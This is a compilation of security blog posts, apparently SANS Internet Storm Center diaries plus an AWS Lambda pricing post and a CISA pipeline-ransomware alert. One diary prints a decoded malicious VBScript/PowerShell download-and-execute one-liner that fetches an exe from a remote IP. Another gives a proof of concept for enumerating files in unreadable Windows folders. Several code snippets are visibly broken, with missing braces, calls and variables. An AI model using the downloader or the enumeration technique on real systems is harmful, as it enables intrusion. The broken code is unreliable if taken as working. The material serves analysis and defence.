Simple but Efficient VBScript Obfuscation, (Sat, Feb 22nd)

This post was originally published on this site

Today, it’s easy to guess if a piece of code is malicious or not. Many security solutions automatically detonates it into a sandbox by security solutions. This remains quick and (most of the time still) efficient to have a first idea about the code behaviour. In parallel, many obfuscation techniques exist to avoid detection by AV products and/or make the life of malware analysts more difficult. Personally, I like to find new techniques and discover how imaginative malware developers can be to implement new obfuscation techniques.

This morning, I spotted a very simple VBSscript based on only 50 lines of code. It gets an excellent VT score: 1/60[1] but it was spotted by my hunting rule!

Basically, all suspicious keywords that could trigger a bell are random strings and replaced during the execution. Example:

x010 = Replace(x010,"OXentrew","Executionpolicy")
x010 = Replace(x010,"BCijaMA","bypass")

The most interesting variable is the following:

x002 = """" & x004 & """-OXentrew BCijaMA -NNoGayGay " _
  & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _
  & " (new-object" _
  & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) " _
  & " -encoding byte -Path  $env:appdataRiCOAOCAONetworkConnections" & rando & "; " _
  & " Start-Process ""$env:appdataRiCOAOCAONetworkConnections" & rando & """"""

Here is the decoded version:

CreateObject("Scripting.FileSystemObject").BuildPath(CreateObject("Wscript.Shell").expandenvironmentstrings( "%systemroot%" ), "System32WindowsPowerShellv1.0powershell.exe" )
  -Executionpolicy bypass
  -windowstyle hidden 
  -command "Set-Content -value (new-object'http://54[.]233[.]198[.]219/a.exe' ) ) 
                 -encoding byte -Path  $env:appdataMicrosoftNetworkConnectionsxxxxxx.exe;
            Start-Process $env:appdataMicrosoftNetworkConnectionsxxxxx.exe"

(The dumped payload xxxxx.exe is a random string of 25 characters)

This onliner downloads and executes a payload. Wha about the payload? It’s a Putty client (SHA256:601cdbddfe6ac894daff506167c164c65446f893d1d5e4b95e92d960ff5f52b0), nothing malicious. There are good chances that this piece of code has been submitted to VT by a Red Team or attackers who are still brushing up their payload. The IP address is an AWS instance and the homepage returns:

me empresta 10k ai???

This Portuguese sentence means “lend me 10k there ???”


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Digital Inheritance

This post was originally published on this site

What happens to our digital presence when we die or become incapacitated? Many of us have or know we should have a will and checklists of what loved ones need to know in the event of our passing. But what about all of our digital data and online accounts? Consider creating some type of digital will, often called a “Digital Inheritance” plan.

Savings Plan Update: Save Up to 17% On Your Lambda Workloads

This post was originally published on this site

Late last year I wrote about Savings Plans, and showed you how you could use them to save money when you make a one or three year commitment to use a specified amount (measured in dollars per hour) of Amazon Elastic Compute Cloud (EC2) or AWS Fargate. Savings Plans give you the flexibility to change compute services, instance types, operating systems, and regions while accessing compute power at a lower price.

Now for Lambda
Today I am happy to be able to tell you that Compute Savings Plans now apply to the compute time consumed by your AWS Lambda functions, with savings of up to 17%. If you are already using one or more Savings Plans to save money on your server-based processing, you can enjoy the cost savings while modernizing your applications and taking advantage of a multitude of powerful Lambda features including a simple programming model, automatic function scaling, Step Functions, and more! If your use case includes a constant level of function invocation for microservices, you should be able to make great use of Compute Savings Plans.

AWS Cost Explorer will now take Lambda usage in to account when it recommends a Savings Plan. I open AWS Cost Explorer, then click Recommendations within Savings Plans, then review the recommendations. As I am doing this, I can alter the term, payment option, and the time window that is used to make the recommendations:

When I am ready to proceed, I click Add selected Savings Plan(s) to cart, and then View cart to review my selections and submit my order:

The Savings Plan becomes active right away. I can use Cost Explorer’s Utilization and Coverage reports to verify that I am making good use of my plans. The Savings Plan Utilization report shows the percentage of savings plan commitment that is being used to realize savings on compute usage:

The Coverage report shows the percentage of Savings Plan commitment that is covered by Savings Plans for the selected time period:

When the coverage is less than 100% for an extended period of time, I should think about buying another plan.

Things to Know
Here are a couple of things to know:

Discount Order – If you are using two or more compute services, the plans are applied in order of highest to lowest discount percentage.

Applicability – The discount applies duration (both on demand and provisioned concurrency), and provisioned concurrency charges. It does not apply to Lambda requests.

Available Now
If you already own a Savings Plan or two and are using Lambda, you will receive a discount automatically (unless you are at 100% utilization with EC2 and Fargate).

If you don’t own a plan and are using Lambda, buy a plan today!



Whodat? Enumerating Who “owns” a Workstation for IR, (Thu, Feb 20th)

This post was originally published on this site

Eventually in almost every incident response situation, you have to start contacting the actual people who sit at the keyboard of affected stations.  Often you’ll want them to step back from the keyboard or logout, for either remote forensics data collection or for remediation.  Or in the worst case, if you don’t have remote re-imaging working in your shop, to either ship their station back to home base for re-imaging or to arrange a local resource to re-image the machien the hard way.

Long story short, what this means is that you need the name of the principal user of that station, and their phone number, preferably their cell number.  Time is usually of the essence in IR, and you can’t always count on or wait for email or voicemail (or VOIP phones either…).  What you will usually find is that often stations will pass from hand-to-hand, outside of IT’s control.  It’s pretty common for managers in remote locations to “stash” a user’s laptop when they leave the company, either as a spare or just to be handy when the next new hire gets onboarded.  It’s also not unheard of for the IT folks re-deploying workstations to make clerical errors as they assign devices (or just plain skip the updates).

What that means is that the hardware / OS / software inventory scripts that we’ve covered in the past only cover 3 or the 4 facets of the actual inventory.  We want to add Userid, Full Username, City / Address and Extension and full phone / cell phone number.  What this also implies is that you want your AD administrators to work more closely with both the telephone and cell phone admins and with HR.  If you use the methods outlined below, it also implies that you’ll be populating the appropriate AD fields with accurate contact information.

First, how do we get the currently logged in user?  We’ve had methods to do this since forever, a few of them are:

Arguably the easiest method is to use pstools.  psloggedin.exe will get you the currently logged in user by scanning the HKEY_USERS registry hive to get logged in User’s SIDs, then users NetSessionEnum API go get the user name.  And, just like psexec, psloggedin will “find a way” – it’ll generally enable what it needs to get the job done, then back out the changes after the data collection is complete.

How does this look?  See below (the -l enumerates only locally logged in user accounts)

> PsLoggedon.exe -nobanner -l nn.nn.nn.nn
Users logged on locally:
     2/4/2020 1:41:40 PM        domainuserid

Note however that this means that you’ll need to loop through each station, and that the station needs to be online to collect this information.

WMIC also does a good job, with similar (and and similarly limited) results.


“nbtstat -a <computername>” was the way to get this info back in the day, but I’m not seeing great success with this command in a modern network.

Query.exe and qwinsta both still work great though:

> query user /server:<hostname or ip>
 <userid>              console             1  Active      none   2/4/2020 1:41 PM

 > qwinsta /server:
 <userid>              console             1  Active      none   2/4/2020 1:41 PM

The problem with all of these is that it just gets us the username – we still have to look up any contact info somewhere else.  This may be simple if your AD is up (or your Exchange / email Services if the GAL serves as your phone book), but might be more difficult if your security incident is more widespread.

More importantly, these all give us the username as a string, with lots of other cruft all around the one string of interest.  This is fine for 1-2-3 hosts, but if you’re collecting info for hundreds or thousands of hosts, not so much.

How about adding user collection to our previous hardware inventory script (in PowerShell)?  This is pretty easy also, and also allows us to add in our contact details.

To get a logged in user:

$a = Get-WmiObject –ComputerName <hostname or ip> –Class Win32_ComputerSystem | Select-Object UserName


(Get-CimInstance works exactly the same way)

Parsing this out to just the username string:

$a.username | ConvertFrom-String -Delimiter “”

P1          P2    
—          —    
DOMAIN      userid

$currentuser = ($a.username | ConvertFrom-String -Delimiter “”).p2

What if our user isn’t logged in, but the machine is powered on?  In that case, we’re digging into the security event log on that machine, looking for event id 4624.  In some cases we’ll see multiple users logging into a computer, so we’ll go back “N” days, and pick the user with the largest count of logins as our principal user for that station.  Note that logon type 2 is a local interactive login, so that’s what we’re looking for in “$[8].value -eq 2”.  An alternative view is that you’ll want to collect all the users of that host, since the principal user might not be available when you call.

$days = -1

$filter = @{

            Logname = ‘Security’

            ID = 4624

            StartTime =  [datetime]::now.AddDays($days)

            EndTime = [datetime]::now


$events += Get-WinEvent -FilterHashtable $filter -ComputerName $WorkstationNameOrIP

$b = $events | where { $[8].value -eq 3 }

Now, on the AD side, let’s add in the infomation collection for phone and email info:

$userinfo = Get-ADUser -filter * -properties Mobile, TelephoneNumber | select samaccountname, name, telephonenumber, mobile, emailaddress

Finally, adding the hardware info from our existing hardware inventory script, we can join the two blocks of information by workstation name, using DNS (we’ll do this in a few paragraphs).  This is more reliable than just using the IP address returned in $pcs, as workstations commonly now have both wired and wireless IPs, so that field is not our most reliable bit of info.

$pcs = get-adcomputer -filter * -property Name,dnshostname,OperatingSystem,Operatingsystemversion,LastLogonDate,IPV4Address

How about if we need to get the username for a station that’s powered off or disconnected?  Remember that during a security incident that target machine might not be operable, or it might be remote.  That’s a bit more time consuming, we’ll need to query AD for users who have logged into the target station.  If multiple users have logged in, then most likely we’ll want the person who has logged in the most, or the complete list with a count for each user.  More useful, a database of all stations and logins can be refreshed weekly, then used to verify our inventory database or just saved so that we have current information in the event of an incident.

In preparation for this, you’ll want to ensure that you are logging all user logins.  The best advice is that you want both successful and failed logins (for obvious reasons), though for this application we need successful logins.  In group policy editor, these settings are at:
Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Login/Logoff > Audit Logon (choose both Success and Failure)

And yes, for reasons unknown Microsoft has these both disabled by default (most vendors follow this same not-so-intuitive path).  Maybe some 1990’s reason like “disk is expensive” or something …

Anyway, with that enabled, we can now query the event log:


#collect a week of data (fewer days will speed up this script)

DAYS = 7

$filter = @{
    Logname = ‘Security’
    ID = 4624
    StartTime =  [datetime]::now.AddDays($days)
    EndTime = [datetime]::now

$events = Get-WinEvent -FilterHashtable $filter -ComputerName $DC.Hostname

To harvest the information of interest, the fields we want are:

$events[n].Properties[5] for the userid
$events[n].Properties[8] needs to be 2 for a local login, or 3 for a remote login.  If you are querying AD logs on the DCs, you’ll want Logon Type 3.
$events[n].Properties[18] for the ip address of workstation

Putting this all into one script:

$U_TO_S = @()
$events = @()

$days = -1
$filter = @{
    Logname = ‘Security’
    ID = 4624
    StartTime =  [datetime]::now.AddDays($days)
    EndTime = [datetime]::now

# Get your ad information
$DomainName = (Get-ADDomain).DNSRoot
# Get all DC’s in the Domain
$AllDCs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem

foreach($DC in $AllDCs) {
    if (test-connection $DC.hostname -quiet) {
        # collect the events
        write-host “Collecting from server” $dc.hostname
        $events += Get-WinEvent -FilterHashtable $filter -ComputerName $DC.Hostname

# filter to network logins only (Logon Type 3), userid and ip address only
$b = $events | where { $[8].value -eq 3 } | `
     select-object @{Name =”user”; expression= {$[5].value}}, `
     @{name=”ip”; expression={$[18].value} }

# filter out workstation logins (ends in $) and any other logins that won’t apply (in this case “ends in ADFS”)
# as we are collecting the station IP’s, adding an OS filter to remove anything that includes “Server” might also be useful
# filter out duplicate username and ip combos
$c = $b | where { $_.user -notmatch ‘ADFS$’ } | where { $_.user -notmatch ‘$$’ } | sort-object -property user,ip -unique

# collect all user contact info from AD
# this assumes that these fields are populated
$userinfo = Get-ADUser -filter * -properties Mobile, TelephoneNumber | select samaccountname, name, telephonenumber, mobile, emailaddress | sort samaccountname

# combine our data into one “users to stations to contact info” variable
# any non-ip stn fields will error out – for instance “-“.  This is not a problem
foreach ( $logevent in $c ) {
            $u = $userinfo | where { $_.samaccountname -eq $logevent.user }
            $tempobj = [pscustomobject]@{
                user = $logevent.user
                stn = []::gethostbyaddress($logevent.ip).hostname
                mobile = $
                telephone = $u.telephonenumber
                emailaddress = $u.emailaddress
            $U_to_S += $tempobj

# We can easily filter here to
# in this case we are filtering out Terminal Servers (or whatever) by hostname, remove duplicate entries
$user_to_stn_db = $U_TO_S | where { $_.stn -notmatch ‘TS’ } | sort-object -property stn, user -unique | sort-object -property user

$user_to_stn_db | Out-GridView

This will get you close to a final “userid + contacts + workstation” database.  What you’ll likely want to add is any additional filters, maybe to remove any VDI station logins, named-user-admin accounts and so on.  If you are seeing ANONYMOUS logins, logins with the built-in “Administrator” accounts, service accounts and so on, you’ll likely want to filter those top, but maybe investigate them first.
Again, with the hostnames and IP addresses in hand it’s now easy to get the station’s OS from our previous inventory scripts, and maybe filter out anything that has the word “Server” in it if the goal is to collect username – workstation information. 

At some point you’ll have some manual edits to do, but a script like this can go a long way towards verifying an existing inventory and contact database, creating a new one from scratch, or just a handy “who logs into what” list with phone numbers.  Remember, for IR you’re not so much concerned with who “owns” a station as to who logs into it often (so you can find those people and then physicall find that station).
So if you have 3 people sharing one station, if your list has all 3 people that’s a win!

As always, I’ll have this script in my github, – look in “Critical Controls / CC01”

If you can, try a script like this in your environment, then user our comment form to let us know if you find anything “odd”.

Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

AA20-049A: Ransomware Impacting Pipeline Operations

This post was originally published on this site

Original release date: February 18, 2020


Note: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK for Industrial Control Systems (ICS) frameworks for all referenced threat actor techniques and mitigations.

This Activity Alert summarizes an incident to which CISA recently responded. It is being shared publicly to promote awareness and encourage mitigations by asset owner operators across all critical infrastructure sectors.

The Cybersecurity and Infrastructure Security Agency (CISA) responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network. The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers. Impacted assets were no longer able to read and aggregate real-time operational data reported from low-level OT devices, resulting in a partial Loss of View [T829] for human operators. The attack did not impact any programmable logic controllers (PLCs) and at no point did the victim lose control of operations. Although the victim’s emergency response plan did not specifically consider cyberattacks, the decision was made to implement a deliberate and controlled shutdown to operations. This lasted approximately two days, resulting in a Loss of Productivity and Revenue [T828], after which normal operations resumed. CISA is providing this Alert to help administrators and network defenders protect their organizations against this and similar ransomware attacks.

Technical Details

Network and Assets

  • The victim failed to implement robust segmentation between the IT and OT networks, which allowed the adversary to traverse the IT-OT boundary and disable assets on both networks.
  • The threat actor used commodity ransomware to compromise Windows-based assets on both the IT and OT networks. Assets impacted on the organization’s OT network included HMIs, data historians, and polling servers.
  • Because the attack was limited to Windows-based systems, PLCs responsible for directly reading and manipulating physical processes at the facility were not impacted.
  • The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process.
  • All OT assets directly impacted by the attack were limited to a single geographic facility.

Planning and Operations

  • At no time did the threat actor obtain the ability to control or manipulate operations. The victim took HMIs that read and control operations at the facility offline. A separate and geographically distinct central control office was able to maintain visibility but was not instrumented for control of operations.
  • The victim’s existing emergency response plan focused on threats to physical safety and not cyber incidents. Although the plan called for a full emergency declaration and immediate shutdown, the victim judged the operational impact of the incident as less severe than those anticipated by the plan and decided to implement limited emergency response measures. These included a four-hour transition from operational to shutdown mode combined with increased physical security.
  • Although the direct operational impact of the cyberattack was limited to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. This resulted in an operational shutdown of the entire pipeline asset lasting approximately two days.
  • Although they considered a range of physical emergency scenarios, the victim’s emergency response plan did not specifically consider the risk posed by cyberattacks. Consequently, emergency response exercises also failed to provide employees with decision-making experience in dealing with cyberattacks.
  • The victim cited gaps in cybersecurity knowledge and the wide range of possible scenarios as reasons for failing to adequately incorporate cybersecurity into emergency response planning.


Asset owner operators across all sectors are encouraged to consider the following mitigations using a risk-based assessment strategy.

Planning and Operational Mitigations

  • Ensure the organization’s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and loss of safety. In particular, response playbooks should identify criteria to distinguish between events requiring deliberate operational shutdown versus low-risk events that allow for operations to continue.
  • Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications. Capture lessons learned in emergency response playbooks.
  • Allow employees to gain decision-making experience via tabletop exercises that incorporate loss of visibility and control scenarios. Capture lessons learned in emergency response playbooks.
  • Identify single points of failure (technical and human) for operational visibility. Develop and test emergency response playbooks to ensure there are redundant channels that allow visibility into operations when one channel is compromised.
  • Implement redundant communication capabilities between geographically separated facilities responsible for the operation of a single pipeline asset. Coordinate planning activities across all such facilities.
  • Recognize the physical risks that cyberattacks pose to safety and integrate cybersecurity into the organization’s safety training program.
  • Ensure the organization’s security program and emergency response plan consider third parties with legitimate need for OT network access, including engineers and vendors.

Technical and Architectural Mitigations

  • Implement and ensure robust Network Segmentation [M1030] between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone (DMZ) that eliminates unregulated communication between the IT and OT networks.
  • Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to Filter Network Traffic [M1037] and monitor communications between zones. Prohibit Industrial Control System (ICS) protocols from traversing the IT network.
  • Require Multi-Factor Authentication [M1032] to remotely access the OT and IT networks from external sources.
  • Implement regular Data Backup [M1053] procedures on both the IT and OT networks. Ensure that backups are regularly tested and isolated from network connections that could enable the spread of ransomware.
  • Ensure user and process accounts are limited through Account Use Policies [M1036], User Account Control [M1052], and Privileged Account Management [M1026]. Organize access rights based on the principles of least privilege and separation of duties.
  • Enable strong spam filters to prevent phishing emails from reaching end users. Implement a User Training [M1017] program to discourage users from visiting malicious websites or opening malicious attachments. Filter emails containing executable files from reaching end users.
  • Filter Network Traffic [M1037] to prohibit ingress and egress communications with known malicious Internet Protocol (IP) addresses. Prevent users from accessing malicious websites using Uniform Resource Locator (URL) blacklists and/or whitelists.
  • Update Software [M1051], including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.
  • Set Anti-virus/Anti-malware [M1049] programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.  
  • Implement Execution Prevention [M1038] by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
  • Implement Execution Prevention [M1038] via application whitelisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder.
  • Limit Access to Resources over Network [M1035], especially by restricting Remote Desktop Protocol (RDP). If after assessing risks RDP is deemed operationally necessary, restrict the originating sources and require Multi-Factor Authentication [M1032].



  • February 18, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Need to raise a advisory case, regarding the ESXi and Firmware upgrade for HP Proliant Servers (BL 460c Gen9 Model)

This post was originally published on this site

Hi Team,


Need to raise a advisory case, regarding the ESXi and Firmware upgrade for HP Proliant Servers (BL 460c Gen9 Model)


1. Running BIOS Firmware version I36 Date 1/21/2018 and ESXI version 6.5 build number 7388607


2. Need to upgrade the SPP version to 2019.09.0 and ESXi version update to 6.5 build number 15256549


So, Kindly suggest the standard procedure here, whether firmware or ESXi needs to upgraded first?




Discovering contents of folders in Windows without permissions, (Tue, Feb 18th)

This post was originally published on this site

I recently noticed an interesting side effect of the way in which Windows handles local file permissions, which makes it possible for a non-privileged user to brute-force contents of a folder for which they don’t have read access (e.g. Read or List folder contents) permissions. It is possible that it is a known technique, however as I didn’t find any write-ups on it anywhere, I thought I’d share it here.

The issue/vulnerability belongs to the CWE-203: Information Exposure Through Discrepancy[1] family and lies in the fact that Windows returns different messages/errors when a user attempts to access existing file or folder for which he doesn’t have read permissions and when he attempts to access a non-existent file or folder. This is true even if he attempts to access existing and non-existent files within a folder for which he doesn’t have any permissions.

The behavior is similar to a vulnerability commonly present in log in functions of web applications. In case of a vulnerable web apps, a log in function returns different responses when user tries to log in with existing username and a wrong password and when he tries to log in with a non-existent username. This vulnerability is customarily checked during penetration tests since, although a valid username by itself doesn’t help potential threat actors too much, it isn’t something we want to offer to them freely.

To demonstrate the issue present in Windows, I created two user accounts on a Windows 10 test machine. First one was an admin account named “user” (and yes, in hindsight this was not the most fortunate name for an admin account) and the second, a non-privileged account, was named “Test”. I further created a folder named “Secret”, containing a file “secret.txt”, with explicit Full control permissions set up for SYSTEM, the Administrators group and the “user” account and no permissions for the “Test” account.

It is obvious that the “Test” account wouldn’t be able to access the folder or list its contents. However, using error messages, for example those generated by attempts to change the currently open directory (cd), the user might infer whether a file or subfolder exists.

Using the error messages, it would be a trivial matter to automate guessing of filenames using a dictionary or a brute-force attack.
Before I noticed that the cd command (and many others) might be used in this way, I wrote a very simple C# PoC app, which can provide the same information and which could easily be converted to brute-force filenames or “guess” them, based on a dictionary.

static void Main(string[] args)
	Console.WriteLine("Input a path to a file to see whether it is accessible, or - if inaccessible - weather it exists or not.");
	Console.WriteLine("Input 'exit' to exit.");
	string input = Console.ReadLine();
	while (input != "exit")
			Console.WriteLine("Access permitted");
		catch (Exception e)
		input = Console.ReadLine();

Similar guessing of paths to the one, which we could employ here, is often used to discover contents of different paths on web servers. Unlike on web servers however, in Windows environments we usually can’t access the contents of the files and subfolders we discover through a simple HTTP GET request. So is this vulnerability actually useful in any way?

By itself not so much, at least in most cases. Although it is definitely unpleasant, without chaining it with some exploit that would actually enable an attacker to read the data in discovered files, all it can do is let a potential malicious actor infer that some file or folder exists. This may be useful for some red teaming activities, but that’s about it.

The only exception I can imagine would be in a situation when a folder would be present on a file system with misconfigured explicit permissions set for subfolders contained within it. In Windows operating systems, it is possible to grant a user permission to interact with a subfolder, even though they don’t have any permissions set for the parent folder. In real life, cases of this nature will be far and few between and most will probably be the result of a mistake by an administrator. Nevertheless, if such a folder was present on a target machine, finding and accessing it would be at least plausible for an attacker. To demonstrate this concept, I’ve created a subfolder “Not_secret” within the C:Secret path, containing a file named “not_secret.txt”.

Afterwards, I gave explicit permissions for this subfolder to our “Test” user.

As you may see from the following output of the PoC app I mentioned above, the “Test” user would be able to interact with the subfolder, if he were to find it, even though he can’t interact with the parent folder.

As far as I’ve been able to determine, the CWE-203 condition is only present when interacting with local drives and not with remote file shares. A malicious user would therefore have to have direct access to the machine on which folders he wants to brute-force are present… Moreover, discovering their contents would definitely not be quick work for him. Nevertheless, although the speed of guessing, which an attacker might achieve, would be slow, and even though the confidentiality impact would be quite limited, this behavior of Windows is certainly less than ideal.

I’ve informed Microsoft Security Response Center about the vulnerability, however as they have determined that it does not meet the bar for security servicing it will not be patched. Although this may be viewed as less than optimal result, one positive point does come out of it – in future, if we ever need to determine what a folder, which we can’t access, actually contains, we have at least this (very inefficient) technique available to us to find out.

Jan Kopriva
Alef Nula

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

curl and SSPI, (Mon, Feb 17th)

This post was originally published on this site

There’s an interesting comment on Xavier’s diary entry “Keep an Eye on Command-Line Browsers” (paraphrasing): a proxy with authentication will prevent wget and curl to access the Internet because they don’t do integrated authentication.

It just happens that since a couple of months, I use curl on Windows with SSPI to authenticate to a proxy. I use the following command:

curl –proxy proxyname:proxyport –proxy-ntlm -U :

First, you need a version of curl with SSPI support:

Windows 10’s version of curl does support SSPI.

With this, I can connect to my proxy (–proxy) and authenticate (–proxy-ntlm) without having the provide credentials to authenticate to the proxy (-U :). curl will use an SSPI to perform integrated authentication to the proxy. This is explained on curl’s man page:

If you use a Windows SSPI-enabled curl binary and do either Negotiate or NTLM authentication then you can tell curl to select the user name and password from your environment by specifying a single colon with this option: “-U :”.

curl’s SSPI feature can also be used to authenticate to an internal IIS server.

By default, curl will not authenticate to a proxy, but it can be directed to do so via options.

I didn’t find a version of wget that supports SSPI. If you know one, or you made one, please post a comment.


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

SOAR or not to SOAR?, (Sun, Feb 16th)

This post was originally published on this site

Security, Orchestration, Automation and Response (SOAR) allow organizations to collect data about security threats from multiple sources to automate an appropriate response on repetitive tasks. As an analyst you need to juggle and pivot several times a day between multiple tools and devices to evaluate a huge amount information and deal with flood of repetitive tasks such as alerts, tickets, email, threat intelligence data, etc. The end goal is to centralize everything in one location to improve analysis using captured institutionalized knowledge.

If you are already using a SOAR tool, what were the main reasons to buy it and did it improve your ability to standardize response procedure in a digital workflow format and standardize best practice?

If you are not using SOAR but are considering implementing it, what are the main qualities you are looking for in this tool?

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

bsdtar on Windows 10, (Sat, Feb 15th)

This post was originally published on this site

Reading Xavier’s diary entry “Keep an Eye on Command-Line Browsers”, I wondered when exactly curl was introduced in Windows 10?

I found this Microsoft blog post from December 2017: Tar and Curl Come to Windows!.

Indeed, another surprise to me: tar (bsdtar) is also a command-line utility that comes with vanilla Windows 10.

Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.